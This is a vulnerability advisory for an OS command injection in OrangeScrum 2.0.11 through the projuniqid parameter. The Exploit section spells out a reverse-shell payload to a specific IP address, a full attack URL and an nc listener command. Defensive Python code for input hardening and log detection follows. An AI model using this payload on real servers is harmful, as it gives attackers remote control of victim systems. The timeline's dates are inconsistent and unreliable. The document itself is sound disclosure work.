OrangeScrum 2.0.11 - OS Command Injection via projuniqid

Summary

Name: OrangeScrum 2.0.11 - OS Command Injection via projuniqid
Code name: Queen
Product: OrangeScrum
Affected versions: 2.0.11
State: Public
Release Date: 2023-01-16

Vulnerability

Kind: OS Command Injection
Rule: 404. OS Command Injection
Remote: Yes
CVSSv3 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CVSSv3 Base Score: 9.9
Exploit available: No
CVE ID(s): CVE-2023-0164

Description

OrangeScrum version 2.0.11 allows an authenticated external attacker to execute arbitrary commands on the server. This is possible because the application injects an attacker-controlled parameter into a system function.

Vulnerability

This vulnerability occurs because the application passes the attacker-controlled projuniqid parameter, without validation or escaping, into a system function that runs it through a shell.

Exploit

To exploit this vulnerability, we just need to send the malicious command we want the server to execute through the projuniqid parameter using the $() syntax.

$(bash -i+>& /dev/tcp/67.205.165.158/3000 0>&1)
https://retr02332bughunter.orangescrum.com/log_times/download_pdf_timelog?projuniqid=$(bash+-i+>%26+/dev/tcp/67.205.165.158/3000+0>%261)&usrid=&date=&strddt=&enddt=&dt_format=d/m/y&checkedFields=date,usr_name,task_no,task_title,hours,description,start,end,break,billable

Thus, we only need to run the command nc -lvp 3000 on the attacker's server to receive the reverse shell from the victim server.

Evidence of exploitation

[Screenshot: vulnerability-code-orangescrum]

[Screenshot: vulnerability-orangescrum]

[Screenshot: exploit-success-orangescrum]

Our security policy

We have reserved the ID CVE-2023-0164 to refer to this issue from now on.

System Information

  • Version: OrangeScrum 2.0.11

  • Operating System: GNU/Linux

Mitigation

There is currently no patch available for this vulnerability.
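Since no vendor patch is available, the two controls a defender can apply are the ones implied by the Description and Vulnerability sections above: never let the projuniqid value reach a shell, and watch request logs for values that could only be there to reach one. The following is an added, illustrative example written for this advisory; it is not OrangeScrum's code (the real application is PHP), and the report-tool path, the projuniqid format, the parameter names other than projuniqid, and the log lines are all constructed assumptions.

```python
"""Illustrative handling of a 'projuniqid'-style parameter that ends up in an
OS command.  Hypothetical code written for this advisory, not OrangeScrum's own
implementation.  Shows the injectable pattern, a hardened replacement, and a
small access-log check for the same parameter.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed assumption: a project id is a short alphanumeric token.
PROJUNIQID_RE = re.compile(r"^[A-Za-z0-9]{1,32}$")

# Shell constructs that have no business in an identifier: $( ), backticks,
# command separators and redirections.
SHELL_META = re.compile(r"\$\(|`|[;&|<>]")


def build_command_vulnerable(projuniqid: str) -> str:
    """The injection-prone pattern: user input spliced into one shell string.
    A shell interpreting this string would expand $(...) before the report
    tool ever sees the argument.  Returned, not executed, to keep the example inert."""
    return f"/usr/bin/report-tool --project {projuniqid} --format pdf"


def build_command_hardened(projuniqid: str) -> list[str]:
    """Allowlist the value, then pass it as a discrete argv element.  Handing
    this list to subprocess.run(...) (with the default shell=False) means no
    shell parses it, so metacharacters are inert even if validation were bypassed."""
    if not PROJUNIQID_RE.fullmatch(projuniqid):
        raise ValueError("projuniqid failed allowlist validation")
    return ["/usr/bin/report-tool", "--project", projuniqid, "--format", "pdf"]


# Combined-log-format line: client, identity, user, [timestamp], "METHOD target PROTO".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)


def suspicious_params(target: str, watched=("projuniqid",)) -> dict[str, str]:
    """Decode the query string (parse_qs undoes %XX and '+' encoding) and
    return the watched parameters whose value carries shell metacharacters."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return {
        name: value
        for name in watched
        for value in params.get(name, [])
        if SHELL_META.search(value)
    }


def scan_log(lines: list[str]) -> list[tuple[str, dict[str, str]]]:
    """Return (client_ip, flagged_params) for each request that trips the check."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        flagged = suspicious_params(m["target"])
        if flagged:
            hits.append((m["ip"], flagged))
    return hits


# Constructed sample log lines: one benign request, one with a raw $( ) in
# projuniqid, one with the same thing percent-encoded (RFC 3986 documentation addresses).
LOG_LINES = [
    '203.0.113.5 - - [16/Jan/2023:10:00:01 +0000] "GET /log_times/download_pdf_timelog'
    '?projuniqid=ab12cd34&usrid=&dt_format=d/m/y HTTP/1.1" 200 5120',
    '203.0.113.9 - - [16/Jan/2023:10:00:07 +0000] "GET /log_times/download_pdf_timelog'
    '?projuniqid=$(id)&usrid= HTTP/1.1" 200 512',
    '198.51.100.7 - - [16/Jan/2023:10:00:12 +0000] "GET /log_times/download_pdf_timelog'
    '?projuniqid=%24%28id%29&usrid= HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, flagged in scan_log(LOG_LINES):
        print(f"{ip}: {flagged}")
```

The hardened builder rejects anything outside the allowlist before the value is used, and because the command is an argument list rather than a string, a value that somehow slipped through would still be delivered to the report tool as a literal argument. The log check decodes the query string first, so percent-encoded variants of the same payload are caught alongside the raw form shown in the Exploit section.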

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

References

Vendor page https://github.com/Orangescrum/orangescrum/

Timeline

2023-01-10: Vulnerability discovered.

2022-01-10: Vendor contacted.

2022-01-10: Vendor replied acknowledging the report.

2022-01-10: Vendor confirmed the vulnerability.

2023-01-16: Public disclosure.